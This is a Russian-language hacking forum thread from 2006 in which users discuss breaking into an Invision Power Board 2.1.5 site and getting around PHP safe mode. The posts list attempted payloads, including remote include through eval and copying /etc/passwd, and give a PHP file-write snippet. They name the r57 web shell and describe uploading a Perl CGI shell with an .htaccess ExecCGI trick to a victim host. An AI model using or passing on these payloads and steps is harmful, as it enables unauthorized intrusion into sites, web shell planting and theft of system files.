Форумы Обход Safe Mode прл взломе Invision Power board

Discussion in 'Уязвимости CMS/форумов' started by 1ten0.0net1, 7 Sep 2006.

  1. 1ten0.0net1

    1ten0.0net1 Time out

    Joined:
    28 Nov 2005
    Messages:
    473
    Likes Received:
    330
    Reputations:
    389
    Прошу совета - есть в наличии 2.1.5 IPB форум.
    Пытаюсь выполнить комманду через багу в регулятных выражениях, но всему мешает SAFE MODE.
    Соответственно - запрещены все system(), passthru(), popen(), exec. Включена опция open_base_dir_ristrict. Фильтруются символы ======> $ ' " . <======
    в созданном посте.
    Пробовал:
    eval (include(http://lalalal));//'
    Пробовал eval(file_get_contents());//'
    Пробовал
    copy("compress.zlib:///etc/passwd", "/home/<username>/passwd.txt");
    Пробовал обходить фильтрацию при помощи
    но это не катит, и я так и не понял как ее нужно обходить и к какой кодировке приводить символы.
    Пробовал просто include, без eval (он, само собой, вообще не исполняется). Что посоветуете?
    У меня вообще один вариант, кажется, остался - пользовать SQL-injection, расшифровывать пароль, а потом пытаться заливать что-нибудь на perl. Кстати, буду рад ссылкам на топики форума об SQL-inject в 2.1.5

    Заранее, благодарю.
     
    2 people like this.
  2. SanyaX

    SanyaX .::Club Life::.

    Joined:
    28 Jan 2005
    Messages:
    936
    Likes Received:
    396
    Reputations:
    261
    В шелле от rst они предусмотрены обход safe mod. А так наверно там половину функций отключены и наверно тяжело очень будет сделать. Не могу дать совета такого сильно.
     
  3. darky

    darky ♠ ♦ ♣ ♥

    Joined:
    18 May 2006
    Messages:
    1,773
    Likes Received:
    825
    Reputations:
    1,418
    если на файле +w то иногда может прокатить

    PHP:
    <?  
    $file '';
    $cont '';  
    $handle fopen($filename'w');  
    fwrite($handle$comecontent);  
    fclose($handle);  
    ?>
    $file – имя файла
    $cont – то, что пишем в файл



    https://forum.antichat.ru/thread17281-2.1.5+sql.html
    https://forum.antichat.ru/thread18495-2.1.5+sql.html
     
  4. MegaBits

    MegaBits Elder - Старейшина

    Joined:
    30 Aug 2006
    Messages:
    151
    Likes Received:
    24
    Reputations:
    10
    У меня таже проблема залил r57shell v 1.31 там есть несколько встроенных способов обхода, но не один не пашет, что можете посоветовать.
     
  5. Zazil

    Zazil Elder - Старейшина

    Joined:
    17 Feb 2005
    Messages:
    38
    Likes Received:
    1
    Reputations:
    0
    Попробуй следующим образом.
    Находим директорию в которую можно писать и доступную по ввв.
    Создаем там файл .htaccess со строчкой Options +ExecCGI внутри.
    Заливаем шелл туда же какойнить перловый шелл.
    Далее делаем ему chmod +x shell.cgi
    Потом пытаемся вызвать его из броузера.
    hxxt://victim.com/blablabla/shell.cgi

    У меня получалось обойти safe_mode таким способом.